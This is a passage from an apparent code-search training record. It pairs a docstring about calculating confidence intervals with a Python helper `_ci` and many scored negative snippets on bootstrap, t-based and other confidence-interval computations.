return np.sum(x) / n\n\n # Jackknife the sample\n mu,sigma,d = jackknife_1D(x, t_func)\n print(f'mu = {mu}, sigma = {sigma}')\n\n # Calculate acceleration\n if acceleration:\n a = bootstrap_acceleration(d)\n else:\n a = 0\n print(f'a = {a}')\n # -------------------------------------------------\n\n # Empirical CDF\n xs,ys = ecdf(theta_i)\n \n # Construct CDF and inverse CDF\n G_cdf = lambda x : interp1d(xs, ys, kind='nearest', fill_value='extrapolate')(x)\n G_invcdf = lambda y : interp1d(ys, xs, kind='nearest', fill_value='extrapolate')(y)\n\n # z0 = \\Phi^{-1} \\hat{G}( \\hat{\\theta} )\n z0 = norm.ppf( G_cdf( theta_MLE ) )\n print(f'z0 = {z0}')\n \n # BCA interval estimates\n interval = np.zeros(len(CL))\n for i in range(len(CL)):\n z_alpha = norm.ppf(CL[i])\n interval[i] = G_invcdf( norm.cdf(z0 + (z0 + z_alpha)/(1 - a*(z0 + z_alpha))) )\n\n if return_full == True:\n return interval,d,a,k_i\n else:\n return interval", "def bootstrap(data, num_samples, statistic, alpha):\n n = len(data)\n idx = npr.randint(0, n, (num_samples, n))\n samples = x[idx]\n stat = np.sort(statistic(samples, 1))\n return (stat[int((alpha/2.0)*num_samples)],\n stat[int((1-alpha/2.0)*num_samples)])", "def test_robbins_confidence(self):\n c = array([1,2,3,0,1])\n r = robbins_confidence(c, 0.05)\n n = 7\n s = 2\n k = sqrt(8/0.05)\n self.assertEqual(r, ((s-k)/(n+1), (s+k)/(n+1)))", "def bootstrapped_rmse_difference(x1,x2, perc=5, N=1000):\n assert(len(x1)==len(x2))\n n_samples = len(x1)\n means = []\n for i in range(N):\n indices = np.random.choice(n_samples, replace=True, size=n_samples)\n # now compute difference in RMSE on this subsample\n mm = np.sqrt(np.mean(x1[indices]**2)) - np.sqrt(np.mean(x2[indices]**2))\n means.append(mm)\n means = np.array(means)\n mmean = np.sqrt(np.mean(x1**2)) - np.sqrt(np.mean(x2**2))\n upper = np.percentile(means, q=100 - perc)\n lower = np.percentile(means, q=perc)\n # assert (upper >= lower) # we deactivate this check here because if one or both of x1 and x2\n # concist only of repreated values, then numerical inaccuracis can lead to\n # lower being a tiny little larger than upper (even though they should be the same in this case)\n return np.array([mmean, lower, upper])", "def mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), stats.sem(a)\n h = se * stats.t._ppf((1 + confidence) /2., n - 1)\n return m, m - h, m + h", "def fit_predictCI(self, y, x, ndays, bootstrap, n_jobs = None):\n os.remove(\"report.log\")\n #Make some parameters avaliable\n self.x = x\n self.y = np.array(y)\n self.ndays = len(self.x) + ndays\n \n \n #Create a lol with data for run the model\n lists = self.__bootstratpTS(npArray = self.y, replicate = bootstrap)\n \n #Model will be fitted and predicted so R) using ci is not consisent\n #Make cores avalible to the process\n pool = mp.Pool(processes = n_jobs)\n \n #Run the model\n results = pool.starmap(self.runSir, [(lists[i], self.x, self.ndays) for i in range(0,len(lists))])\n\n self.preds = [results[i][0] for i in range(0,len(lists))] #get predictions\n\n a = [results[i][1][0] for i in range(0,len(lists))] #get a\n b = [results[i][1][1] for i in range(0,len(lists))] #get b\n lim_inf, med, lim_sup = self.__computeCI()\n \n \n return {\"a\": a, \"b\": b, \"lim_inf\": lim_inf, \"med\": med, \"lim_sup\": lim_sup}", "def errors_experiment(data, conf):\n\n mean = np.sum(data / conf ** 2) / np.sum(1 / conf ** 2)\n error = np.sum(1 / conf ** 2) ** (-1 / 2)\n error = max(error, np.max(conf))\n\n return mean, 
error", "def does_ci_narrow(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n if abs(ci1 - ci2) < CI_MINIUM_SIGNIFICANT_NARROWING:\n return SAME\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return does_interval_narrow((x1, y1), (x2, y2))" ]
[ "0.6679884", "0.6648013", "0.6620062", "0.66174746", "0.6499037", "0.646875", "0.6136825", "0.6136825", "0.61319476", "0.6111559", "0.60788226", "0.6075902", "0.6074073", "0.5812202", "0.5790033", "0.57862234", "0.57668763", "0.57511514", "0.574001", "0.5700028", "0.5675738", "0.5670809", "0.56043696", "0.5597088", "0.5589453", "0.55657214", "0.5554705", "0.5529725", "0.5524544", "0.5507186", "0.5500882", "0.54704136", "0.54690397", "0.5447993", "0.5446354", "0.5439081", "0.54360664", "0.5417386", "0.54119116", "0.5395196", "0.53788257", "0.5376365", "0.5365907", "0.53559154", "0.53549784", "0.53479934", "0.5343954", "0.5330144", "0.53156215", "0.53034174", "0.5299938", "0.5292536", "0.52743024", "0.52701384", "0.52659225", "0.52585584", "0.5256971", "0.52417105", "0.52384967", "0.52251714", "0.52168626", "0.51571727", "0.51563853", "0.5154822", "0.5152408", "0.5114885", "0.5111021", "0.5104804", "0.5100056", "0.5093388", "0.5091186", "0.5090804", "0.5088325", "0.5081332", "0.5072357", "0.50688773", "0.5068325", "0.5059719", "0.50495857", "0.5047843", "0.50404525", "0.5040308", "0.5037232", "0.5030829", "0.5025745", "0.50181663", "0.50153464", "0.50053704", "0.5001538", "0.5001346", "0.4999432", "0.49981588", "0.49963424", "0.49874413", "0.49840617", "0.49830377", "0.4975638", "0.4973256", "0.49685064", "0.4958472" ]
0.6944301
0
Calculate confidence interval. Auxiliary function for plot_compare_evokeds.
def _ci(arr, ci=0.95, method="bootstrap", n_bootstraps=2000, random_state=None):
    if method == "bootstrap":
        return bootstrap_confidence_interval(
            arr, ci=ci, n_bootstraps=n_bootstraps, random_state=random_state
        )
    else:
        from .parametric import _parametric_ci

        return _parametric_ci(arr, ci=ci)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def confidence_interval(self):\r\n coh_var = np.zeros((self.input.data.shape[0],\r\n self.input.data.shape[0],\r\n self._L), 'd')\r\n for i in range(self.input.data.shape[0]):\r\n for j in range(i):\r\n if i != j:\r\n coh_var[i, j] = tsu.jackknifed_coh_variance(\r\n self.spectra[i],\r\n self.spectra[j],\r\n self.eigs,\r\n adaptive=self._adaptive\r\n )\r\n\r\n idx = triu_indices(self.input.data.shape[0], 1)\r\n coh_var[idx[0], idx[1], ...] = coh_var[idx[1], idx[0], ...].conj()\r\n\r\n coh_mat_xform = tsu.normalize_coherence(self.coherence,\r\n 2 * self.df - 2)\r\n\r\n lb = coh_mat_xform + dist.t.ppf(self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n ub = coh_mat_xform + dist.t.ppf(1 - self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n\r\n # convert this measure with the normalizing function\r\n tsu.normal_coherence_to_unit(lb, 2 * self.df - 2, lb)\r\n tsu.normal_coherence_to_unit(ub, 2 * self.df - 2, ub)\r\n\r\n return ub - lb", "def confidence_interval(data, control_label=None, *args, **kwargs):\n def fn(control, test):\n c_means = CompareMeans(DescrStatsW(test), DescrStatsW(control))\n if _is_proportion(control, test):\n return c_means.zconfint_diff()\n else:\n return c_means.tconfint_diff()\n\n return _apply(data, fn, control_label)", "def confidenceInterval(start,end,confidence):\n\n\tmean = 0.5*(end+start)\n\tstddev = getStdDev(0.5*(end-start), confidence)\n\n\treturn (mean,stddev)", "def compute_confidence_interval(data):\n a = 1.0 * np.array(data)\n m = np.mean(a)\n std = np.std(a)\n pm = 1.96 * (std / np.sqrt(len(a)))\n return m, pm", "def plot_confidence_interval_for_data (model, X):\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n preds_ds = pd.DataFrame()\n preds_ds['mean'] = preds.mean(axis=1)\n preds_ds['std'] = preds.std(axis=1)\n\n fig = plt.figure(figsize=(15,6))\n my_xticks = ['datapoint ' + str(i+1) for i in list(preds_ds.index)]\n plt.errorbar(x = preds_ds.index, y=preds_ds['mean'], yerr=preds_ds['std'], \n fmt='o', color='blue', ecolor='lightblue', capsize=3)\n plt.title('Confidence Interval for the predicted value')\n plt.xticks(preds_ds.index, my_xticks)\n for i in list(preds_ds.index):\n m, std = round(preds_ds['mean'][i],1), round(preds_ds['std'][i],2)\n s=f' pred={m} \\n std dev= {std}'\n plt.text(x = i, y=preds_ds['mean'][i], s=s ) \n plt.show()", "def get_confidence_interval(self,a,b):\n\t\tk_vals,prob_vals = self.tuple_of_probabilities\n\t\tworking_indices = [i for i,v in enumerate(k_vals) if (v >= a and v<= b)]\n\t\tworking_prob_vals = [prob_vals[i] for i in working_indices]\n\t\treturn sum(working_prob_vals)", "def confidence(self) -> float:\n return self._confidence", "def test_confidence_intervals(self):\n # Taken from a T-Test table\n\n # Two Tailed\n p, ci = _p_value_and_confidence_intervals(2.228, 10, 'two')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n np.testing.assert_allclose(ci, [-2.228, 2.228], atol=.001)\n\n # Left One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.895, 7, 'left')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[0]))\n np.testing.assert_allclose(ci, [-np.inf, 1.895], atol=.001)\n\n # Right One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.761, 14, 'right')\n\n self.assertAlmostEqual(1-p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[1])) \n np.testing.assert_allclose(ci, [-1.761, np.inf], atol=.001)", "def 
compute_confidence_interval(self) -> bool:\n return False", "def confidence_intervals(data):\r\n\r\n x_bar = np.nanmean(data) # Mean value\r\n s = np.nanstd(data) # Standard deviation\r\n n = len(data) # Sample size\r\n\r\n lo_conf = x_bar - (1.96 * (s / np.sqrt(n))) # Lower bound of confidence interval\r\n hi_conf = x_bar + (1.96 * (s / np.sqrt(n))) # Upper bound of confidence interval\r\n\r\n conf_range = hi_conf - lo_conf # Size of the 95% confidence interval\r\n\r\n return lo_conf, hi_conf, conf_range", "def confidence(self) -> float:\n return float(self.class_scores[self.class_num])", "def confidence(self):\n return self._confidence", "def confidence(self):\n return self._confidence", "def get_confidence_interval(self, scores, ci_method='bca', ci_size=0.95, replications=100000, seed_value=None):\n def score(x):\n return np.array([x.mean()])\n data = np.array([float(score) for score in scores])\n if min(data) == max(data):\n return tuple([min(data), max(data)])\n bs = IIDBootstrap(data)\n if seed_value is not None:\n bs.seed(seed_value)\n ci = bs.conf_int(score, replications, method=ci_method, size=ci_size, tail='two')\n return tuple([ci[0][0], ci[1][0]])", "def compute_credible_interval(vals, weights, confidence: float = 0.95):\n if confidence <= 0.0 or confidence >= 1.0:\n raise ValueError(\n f\"Confidence {confidence} must be in the interval (0.0, 1.0).\"\n )\n alpha_lb = 0.5 * (1.0 - confidence)\n alpha_ub = confidence + alpha_lb\n lb = compute_quantile(vals, weights, alpha_lb)\n ub = compute_quantile(vals, weights, alpha_ub)\n return lb, ub", "def do_mean_cis_differ(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return do_intervals_differ((x1, y1), (x2, y2))", "def _confidence_interval_function(xq, cinfo):\n a = cinfo.a.copy()\n a[cinfo.indx] = xq\n\n yfit, _ = cinfo.fit_function(a, pderflg=False)\n if yfit.dtype in ['complex64','complex128']:\n yfit = np.concatenate([yfit.real,yfit.imag])\n wchisqr1 = np.sum(cinfo.ww*(yfit-cinfo.dat)**2)/cinfo.nfree\n \n goal = abs(wchisqr1-cinfo.wchi*cinfo.factor)\n \n return goal", "def calculate_confidence_interval(input_data, confidence_coeficient=0.95):\n error_margin = ExperimentUtil._calculate_error_margin(input_data, confidence_coeficient)\n superior_limit = statistics.mean(input_data) + error_margin\n inferior_limit = statistics.mean(input_data) - error_margin\n return superior_limit, inferior_limit", "def ci_diff_prop(p1, p2, n1, n2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n prop_diff = p1 - p2\n # find the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n margin_of_error = z_star * (np.sqrt((p1 * (1 - p1) / n1) + (p2 * (1 - p2) / n2)))\n # calculate the lower and upper bound\n lcb = prop_diff - margin_of_error\n ucb = prop_diff + margin_of_error\n print(\n \"{}% Confidence Interval for difference in two Population proportions: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def confidence_intervals(self, level = 95):\n margin = (100 - level) / 2 # interval is middle level% of vals, so this is margin to either side of it\n try:\n len(self.binom_control)\n len(self.binom_treatment)\n\n except:\n self.binom_distribution()\n\n control = self.binom_control\n treatment = self.binom_treatment\n\n control_upper = np.percentile(a = control, q = level + margin)\n control_lower = np.percentile(a = control, q = 
margin)\n self.interval_control = {'lower': control_lower, 'upper':control_upper, 'level':level}\n\n treatment_upper = np.percentile(a = treatment, q = level + margin)\n treatment_lower = np.percentile(a = treatment, q = margin)\n self.interval_treatment = {'lower': treatment_lower, 'upper':treatment_upper, 'level':level}\n\n return self.interval_control, self.interval_treatment", "def t_confidence_Interval_Difference_Of_Means(xSamples, ySamples, confidence):\n try:\n if len(xSamples) >= 30 or len(ySamples) >= 30:\n raise sampleSizeError(\"Should use normal distribution instead. m or n > 30.\")\n \n if confidence > 1:\n confidence = confidence / 100.0\n print(f\"Converting confidence interval to {confidence}\")\n\n elif type(confidence) != int or type(confidence) != float:\n raise ValueError(\"Confidence Interval must be a numeric value\")\n \n # Find mean and variance for both sample distributions\n n = len(xSamples) \n xBar = sample_mean(xSamples)\n xSampStd = sample_variance(xSamples) ** .5\n \n m = len(ySamples)\n yBar = sample_mean(ySamples)\n ySampStd = sample_variance(ySamples) ** .5\n \n # Find t at alpha/2 and the new distribution's sample size - 2\n # Calculate the sample pooling standard deviation\n tAlpha = (1 + confidence) / 2.0\n t = scipy.stats.t.ppf(tAlpha, (m + n - 2)) \n spsd = ((((n - 1)* (xSampStd**2)) + ((m - 1) * (ySampStd**2)))/(m + n - 2)) ** .5 \n \n # Find the lower and upper bound \n # (X-Y) (+/-) t((spsd * (((1/m)+(1/n)) **.5))\n lowerBound = (xBar - yBar) - t * (spsd * (((1/m)+(1/n)) **.5))\n upperBound = (xBar - yBar) + t * (spsd * (((1/m)+(1/n)) **.5))\n \n return lowerBound, upperBound\n \n except sampleSizeError as inst:\n print(inst.args[0])\n \n except ValueError as inst:\n print(inst.args[0])", "def ci(self):\n var_assumptions = self.var_assumptions if self.var_assumptions == \"pooled\" else \"unequal\"\n ci_vals = self.comparison.zconfint_diff(self.alpha, self.hypothesis_sm, var_assumptions)\n\n return [ci_vals, self.ci_percents]", "def _nelson_aalen_ci(estimate, variance, conf_type, conf_level):\n # Standard normal quantile for normal approximation confidence intervals\n quantile = st.norm.ppf((1 - conf_level) / 2)\n\n # Compute confidence intervals at the observed event times\n if conf_type == \"linear\":\n error = quantile * np.sqrt(variance)\n lower = estimate + error\n upper = estimate - error\n elif conf_type == \"log\":\n error = np.exp(quantile * np.sqrt(variance) / estimate)\n lower = estimate * error\n upper = estimate / error\n else:\n # This should not be reachable\n raise RuntimeError(f\"Invalid confidence interval type: {conf_type}.\")\n\n # Force confidence interval lower bound to be 0\n lower = np.maximum(lower, 0.)\n\n return lower, upper", "def conf(self, success, total):\n try:\n sp = success / total\n conf = binom_conf_interval(success, total, interval='jeffreys')\n uperr = conf[1] - sp # 1 sigma confidence above mean\n loerr = sp - conf[0] # 1 sigma confidence below mean\n return sp, uperr, loerr, 0.5*(uperr+loerr)\n except ValueError as e:\n return 0, 0, 0, 0", "def confidenceInterval(model, N = 30):\n predicted_accuracies = [0]*N\n predicted_roc = [0]*N\n for i in tqdm(range(N)):\n X_train, X_test, y_train, y_test = train_test_split(X, y_binary, random_state=i)\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n model = model.fit(X_train, y_train)\n predicted_accuracies[i] = accuracy_score(model.predict(X_test), y_test)\n predicted_roc[i] = 
roc_auc_score(model.predict(X_test), y_test)\n r = np.mean(predicted_roc)\n m = np.mean(predicted_accuracies)\n\n variance_roc = np.var(predicted_roc)\n variance_acc = np.var(predicted_accuracies)\n sd_acc = np.sqrt(variance_acc)\n sd_roc = np.sqrt(variance_roc)\n CI_acc = 2*sd_acc\n CI_roc = 2*sd_roc\n return m, CI_acc, r, CI_roc", "def mean_confidence_interval(data, confidence=0.95):\n\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h", "def confidence(samples, confidence_level):\n mean = scipy.mean(samples)\n sdev = scipy.std(samples)\n n = len(samples)\n df = n - 1\n t = distributions.t.ppf((1+confidence_level)/2.0, df)\n interval = (interval_low, interval_high) = ( mean - t * sdev / math.sqrt(n) , mean + t * sdev / math.sqrt(n) )\n interval_size = interval_high - interval_low\n interval_percentage = interval_size / mean * 100.0\n return (interval, mean, sdev, interval_percentage)", "def ci_diff_mean_std_known(array1, array2, std1, std2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n\n # margin of error\n margin_of_error = z_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), stats.sem(a)\n h = se * stats.t._ppf((1 + confidence) /2., n - 1)\n return m, m - h, m + h", "def get_confidence_interval(\n num_people,\n num_iter=1000000,\n percentile=2.576,\n num_days=365,\n):\n mean = 0.0\n variance = 0.0 # not exactly\n for i in range(1, num_iter + 1):\n x = [randint(1, num_days) for person in range(num_people)]\n x.sort()\n is_consecutive = any(p + 1 == q for (p, q) in zip(x[:-1], x[1:], strict=True))\n is_a_loop = x[0] + num_days - 1 == x[-1]\n is_positive = int(is_consecutive or is_a_loop)\n delta = is_positive - mean\n mean += delta / float(i)\n variance += delta * (is_positive - mean)\n sd = sqrt(variance / float(num_iter - 1))\n lower_bound = mean - percentile * sd / sqrt(num_iter)\n upper_bound = mean + percentile * sd / sqrt(num_iter)\n print(\n \"Number of people: {}\\tLower bound: {:2.5%}\\tUpper bound: {:2.5%}\".format(\n num_people,\n lower_bound,\n upper_bound,\n ),\n )\n return lower_bound, upper_bound", "def test_conf_interval_ecdf_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"ecdf\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"ecdf\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column 
names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n pred_df[ERR_STD_COL] = round(pred_df[ERR_STD_COL], 2)\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.32, 289.38, 291.3, 291.34), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.63, -5.56, -4.13, -4.08), (\n \"quantiles are incorrect\")\n expected_stds = [0.29, 0.42, 0.42, 0.42, 0.42, 0.58, 0.58, 0.58, 0.58, 0.58,\n 0.58, 0.42]\n assert list(pred_df[ERR_STD_COL].values) == expected_stds", "def two_proportion_confidence_interval(hits1, attempts1, hits2, attempts2, alpha=0.05):\n \n # Calculate proportions:\n proportion1 = hits1/attempts1\n proportion2 = hits2/attempts2\n difference_of_proportions = proportion1 - proportion2\n \n # Calculate standard error:\n SE = two_proportion_standard_error(hits1, attempts1, hits2, attempts2)\n \n # Save the critical value at the specified confidence:\n z_critical = stats.norm.ppf(1 - 0.5*alpha)\n \n # Calculate margin of error:\n moe = z_critical * SE\n \n # Calculate confidence intervals:\n confidence_lower = difference_of_proportions - moe\n confidence_higher = difference_of_proportions + moe\n \n return difference_of_proportions, moe, confidence_lower, confidence_higher", "def bootstrap_confidence_interval(\n arr, ci=0.95, n_bootstraps=2000, stat_fun=\"mean\", random_state=None\n):\n if stat_fun == \"mean\":\n\n def stat_fun(x):\n return x.mean(axis=0)\n\n elif stat_fun == \"median\":\n\n def stat_fun(x):\n return np.median(x, axis=0)\n\n elif not callable(stat_fun):\n raise ValueError(\"stat_fun must be 'mean', 'median' or callable.\")\n n_trials = arr.shape[0]\n indices = np.arange(n_trials, dtype=int) # BCA would be cool to have too\n rng = check_random_state(random_state)\n boot_indices = rng.choice(indices, replace=True, size=(n_bootstraps, len(indices)))\n stat = np.array([stat_fun(arr[inds]) for inds in boot_indices])\n ci = (((1 - ci) / 2) * 100, ((1 - ((1 - ci) / 2))) * 100)\n ci_low, ci_up = np.percentile(stat, ci, axis=0)\n return np.array([ci_low, ci_up])", "def boot_conf_intervals(indep,\n dep,\n estimator,\n display_name=None,\n resample_cases=False,\n significance=0.05,\n num_sims=10000,\n verbose=True,\n seed=None,\n precision=4):\n if display_name is None:\n display_name = \"\"\n\n est_params = estimator.fit(indep, dep)\n est_params = np.array(est_params)\n\n params_arr = resampling.boot_param_dist(indep=indep,\n dep=dep,\n estimator=estimator,\n num_sims=num_sims,\n resample_cases=resample_cases,\n seed=seed,\n include_fixed_params=False,\n verbose=verbose)\n\n if estimator.has_restricted_params:\n est_params = est_params[estimator.estimated_params_indices]\n\n (bca_ci_df,\n percentile_ci_df,\n basic_ci_df) = _confidence_intervals(params_arr=params_arr,\n est_params=est_params,\n significance=significance,\n estimator=estimator,\n indep=indep,\n dep=dep)\n\n if verbose:\n def my_formatter(x):\n format_str = '.' 
+ str(precision) + 'f'\n return format(x, format_str)\n\n formatters = [my_formatter for dummy in range(len(bca_ci_df.columns))]\n\n print()\n print(\"confidence level: \", 100.0 * (1.0 - significance), \"%\")\n print()\n print(\"bootstrap bca confidence intervals\")\n print()\n print(bca_ci_df.to_string(formatters=formatters))\n# if latex:\n# print(bca_ci_df.to_latex(escape=False, formatters=formatters))\n# else:\n print(\"bootstrap percentile confidence intervals\")\n print()\n print(percentile_ci_df.to_string(formatters=formatters))\n print()\n print(\"bootstrap basic confidence intervals\")\n print()\n print(basic_ci_df.to_string(formatters=formatters))\n print()\n\n return bca_ci_df, percentile_ci_df, basic_ci_df", "def conf_interval_two_means(datae,dataf,conf):\n \n # Dataset E\n data_e = 1.0*np.array(datae)\n n_e = data_e.shape[0]*data_e.shape[1]\n mean_e = np.array(data_e).mean()\n var_e = np.array(data_e).var(ddof=1)\n df_e = n_e-1\n \n # Dataset F\n data_f = 1.0*np.array(dataf)\n n_f = dataf.shape[0]*dataf.shape[1]\n mean_f = np.array(data_f).mean()\n var_f = np.array(data_f).var(ddof=1)\n df_f = n_f-1\n \n # Sp,t calculated for lower/upper bounds \n Sp = np.sqrt((((df_e*var_e) + (df_f*var_f))/(df_e+df_f)))\n t = abs(scs.t.ppf(((1-conf)/2), (df_e+df_f)))\n lower = (mean_e-mean_f)-(Sp*t*np.sqrt(1/n_e+1/n_f))\n upper = (mean_e-mean_f)+(Sp*t*np.sqrt(1/n_e+1/n_f))\n \n return lower,upper", "def ci_diff_mean_std_unknown(array1, array2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # standard deviation fo samples\n std1 = np.std(array1)\n std2 = np.std(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # degrees of freddom\n deg_fred = deg_fred_two_means(std1, std2, n1, n2)\n\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, deg_fred), 3)\n\n # margin of error\n margin_of_error = t_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def plot_confidence(self, level = None, show = False):\n try: # Check to see if intervals have been calculated, already\n if level and level != self.interval_control['level']:\n self.confidence_intervals(level = level)\n else:\n level = self.interval_control['level']\n except: # If not, calculate them\n if level == None:\n level = 95\n self.confidence_intervals(level = level)\n\n int_control = [self.interval_control[k] for k in ['lower','upper']]\n int_treatment = [self.interval_treatment[k] for k in ['lower','upper']]\n\n low_end = min(int_control[0], int_treatment[0])\n high_end = max(int_control[1], int_treatment[1])\n r = high_end - low_end\n low_lim = low_end - (0.1 * r)\n high_lim = high_end + (0.1 * r)\n\n data = [\n go.Scatter(\n mode = 'lines+markers',\n line = dict(color = 'blue', width = 4),\n marker = dict(color = 'black', size = 10, symbol = 'line-ns-open'),\n x = int_control,\n y = [0.75 for i in range(len(int_control))],\n name = 'Control'\n ),\n go.Scatter(\n mode = 'lines+markers',\n line = dict(color = 'orange', width = 4),\n marker = dict(color = 'black', size = 10, symbol = 'line-ns-open'),\n x = int_treatment,\n y = [1.25 for i in 
range(len(int_treatment))],\n name = 'Treatment'\n )\n ]\n\n layout = dict(\n title = '{}% Confidence Intervals, Treatment vs Control'.format(level),\n plot_bgcolor = 'white',\n height = 350,\n width = 800,\n xaxis = dict(title = 'Probabilities',\n range = (low_lim, high_lim),\n showgrid = False,\n zeroline = False,\n showline = True,\n linecolor = 'black',\n tickformat = ',.0%'),\n yaxis = dict(range = (0,2),\n showgrid = False,\n zeroline = False,\n showline = True,\n linecolor = 'black',\n visible = False)\n )\n\n fig = go.Figure(data = data, layout = layout)\n\n if show:\n fig.show()\n\n return fig", "def plot_confidence_interval_for_variable (model, X, y, variable):\n\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n X_ds_new = X.copy()\n X_ds_new['actual'] = y\n X_ds_new['pred'] = np.mean(preds, axis=1)\n X_ds_new['pred_std'] = np.std(preds, axis=1)\n\n X_ds_grp = X_ds_new.groupby(variable)['actual', 'pred', 'pred_std'].agg('mean')\n X_ds_grp['count'] = X_ds_new[variable].value_counts()\n\n print (f'Average Predicted value and Std Dev by : {variable}')\n display(X_ds_grp)\n print ('')\n print (f'Distribution of Predicted value by : {variable}')\n sns.catplot(x=variable, y='pred', data=X_ds_new, kind='box')\n plt.show()", "def find_confidence(self, t, df):\n t_table = self.t_table\n nearest_df = round(find_nearest(t_table.index, df), 0)\n nearest_t = round(find_nearest(t_table.loc[nearest_df], t), 6)\n for col in list(t_table):\n if nearest_t == round(t_table[col][nearest_df], 6):\n # Subtract from one to get confidence, divide by two to get\n # single section on positive side of distribution.\n confidence = (1.0 - float(col)) / 2.0\n return confidence", "def generate_confidence(self):\n conf_score = np.random.normal(self.speech_conf_mean,\n self.speech_conf_std)\n conf_score = round(conf_score, 2)\n conf_score = max(conf_score, 0.0) # >= 0.\n conf_score = min(conf_score, 1.0) # <= 1.\n return conf_score", "def calc_conf(deviation, tolerance, mape):\n return (1 - ((mape / 100) * (deviation/tolerance))) * 100", "def confidence(s, p):\r\n p = Basic.sympify(p)\r\n assert p <= 1\r\n\r\n d = (s.b-s.a)*p / 2\r\n return (s.mean - d, s.mean + d)", "def confidence_at_98tpr(self):\r\n\r\n return self.confidence_at_tpr(0.98)", "def generate_confidence_interval(ranking):\n nodes = list()\n for x in ranking:\n if x:\n nodes.extend(x[1].keys())\n ci = dict.fromkeys(set(nodes))\n for node in ci:\n # first constuct array of ranking\n ranks = [_catch(x[1], node) for x in ranking if _catch(x[1], node)]\n if len(ranks) == 1:\n ci[node] = (np.nan, np.nan)\n else:\n mean, se, m = np.mean(ranks), sem(ranks), t.ppf((1 + 0.95) / 2., len(ranks) - 1)\n interval = (mean - m*se, mean + m*se)\n # confidence intervals below 0 or above 1 are meaningless\n if interval[0] < 0:\n interval = (0, interval[1])\n if interval[1] > 1:\n interval = (interval[0], 1)\n ci[node] = interval\n return ci", "def plot_confidence(x, Y, confidence=0.95, shade_color=\"#3498db\", line_color=\"#34495e\"):\n y, lb, ub = zip(*[mean_confidence_interval(Y[:, j], confidence) for j in range(Y.shape[1])])\n plt.fill_between(\n range(Y.shape[1]),\n lb, ub,\n color=shade_color\n )\n plt.plot(range(Y.shape[1]), y, lw=2, color=line_color)", "def confidence_at_95tpr(self):\r\n\r\n return self.confidence_at_tpr(0.95)", "def does_ci_narrow(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n if abs(ci1 - ci2) < CI_MINIUM_SIGNIFICANT_NARROWING:\n return SAME\n x1 
